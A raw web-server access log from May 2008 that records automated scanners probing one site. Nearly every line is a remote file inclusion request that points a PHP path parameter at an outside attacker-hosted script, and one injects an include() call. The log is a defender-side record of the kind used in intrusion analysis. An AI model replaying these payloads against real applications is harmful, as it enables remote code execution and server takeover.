189.22.150.131 - - [02/May/2008:11:19:42 -0700] "GET /str.php?p=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:11:19:43 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:11:19:43 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:11:19:44 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.22.150.131 - - [02/May/2008:11:19:48 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.22.150.131 - - [02/May/2008:11:19:52 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:11:19:55 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:11:19:55 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:11:19:56 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:20:16 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:20:22 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:11:20:27 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:11:20:27 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:20:27 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:11:20:27 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.113.203.55 - - [02/May/2008:11:20:29 -0700] "GET /index.php?body=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:20:38 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:20:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:20:39 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:20:47 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:20:47 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:20:48 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:20:49 -0700] "GET /logs/access.log/default.php?pagina=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:20:49 -0700] "GET /default.php?pagina=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:20:50 -0700] "GET /logs/default.php?pagina=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.186.99 - - [02/May/2008:11:20:51 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.186.99 - - [02/May/2008:11:20:52 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.186.99 - - [02/May/2008:11:20:52 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:20:54 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:20:54 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:11:21:09 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:11:21:12 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:11:21:12 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:11:21:13 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:11:21:15 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:11:21:17 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:11:21:20 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:11:21:20 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:21:21 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:21:21 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:21:21 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:11:21:32 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:11:21:33 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:11:21:33 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:11:21:39 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://fadhilla.net/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:21:39 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:11:21:40 -0700] "GET //config/dbutil.bck.php?confdir=http://fadhilla.net/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:11:21:40 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://fadhilla.net/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:11:21:45 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:11:22:01 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:22:10 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.219.101.32 - - [02/May/2008:11:22:11 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [02/May/2008:11:22:11 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [02/May/2008:11:22:11 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:11:22:11 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.219.101.32 - - [02/May/2008:11:22:13 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [02/May/2008:11:22:13 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [02/May/2008:11:22:13 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:22:13 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 200 4123 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:22:14 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:11:22:18 -0700] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:11:22:19 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:11:22:20 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:11:22:21 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.219.101.32 - - [02/May/2008:11:22:21 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.246.118.249 - - [02/May/2008:11:22:21 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.219.101.32 - - [02/May/2008:11:22:21 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [02/May/2008:11:22:21 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.246.118.249 - - [02/May/2008:11:22:22 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.246.118.249 - - [02/May/2008:11:22:22 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.120.63.194 - - [02/May/2008:11:22:30 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/berek/papi/mami/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [02/May/2008:11:22:36 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [02/May/2008:11:22:36 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [02/May/2008:11:22:37 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:22:48 -0700] "GET /logs/access_080121.log/myevent.php?myevent_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:22:49 -0700] "GET /myevent.php?myevent_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:22:49 -0700] "GET /logs/myevent.php?myevent_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:22:51 -0700] "GET /logs/access_080205.log/myevent.php?myevent_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:22:53 -0700] "GET /logs/access_080227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:22:54 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:22:54 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:23:05 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.53.192.226 - - [02/May/2008:11:23:06 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:23:06 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.800" "www.dmulk.com"
74.53.192.226 - - [02/May/2008:11:23:06 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:23:06 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.53.192.226 - - [02/May/2008:11:23:06 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:23:12 -0700] "GET /logs/access_080213.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:23:13 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:23:13 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:23:14 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:23:28 -0700] "GET /logs/access_080121.log/myevent.php?myevent_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:23:29 -0700] "GET /myevent.php?myevent_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:23:29 -0700] "GET /logs/myevent.php?myevent_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:23:31 -0700] "GET /logs/access_080205.log/myevent.php?myevent_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.192.226 - - [02/May/2008:11:23:35 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [02/May/2008:11:23:35 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [02/May/2008:11:23:35 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [02/May/2008:11:23:42 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [02/May/2008:11:23:42 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [02/May/2008:11:23:42 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
59.120.63.194 - - [02/May/2008:11:23:51 -0700] "GET /logs/access_080309.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/berek/papi/mami/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:23:52 -0700] "GET /logs/access_080227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:23:53 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:23:53 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.192.226 - - [02/May/2008:11:24:00 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [02/May/2008:11:24:00 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [02/May/2008:11:24:01 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:24:06 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:24:07 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:24:07 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:24:10 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
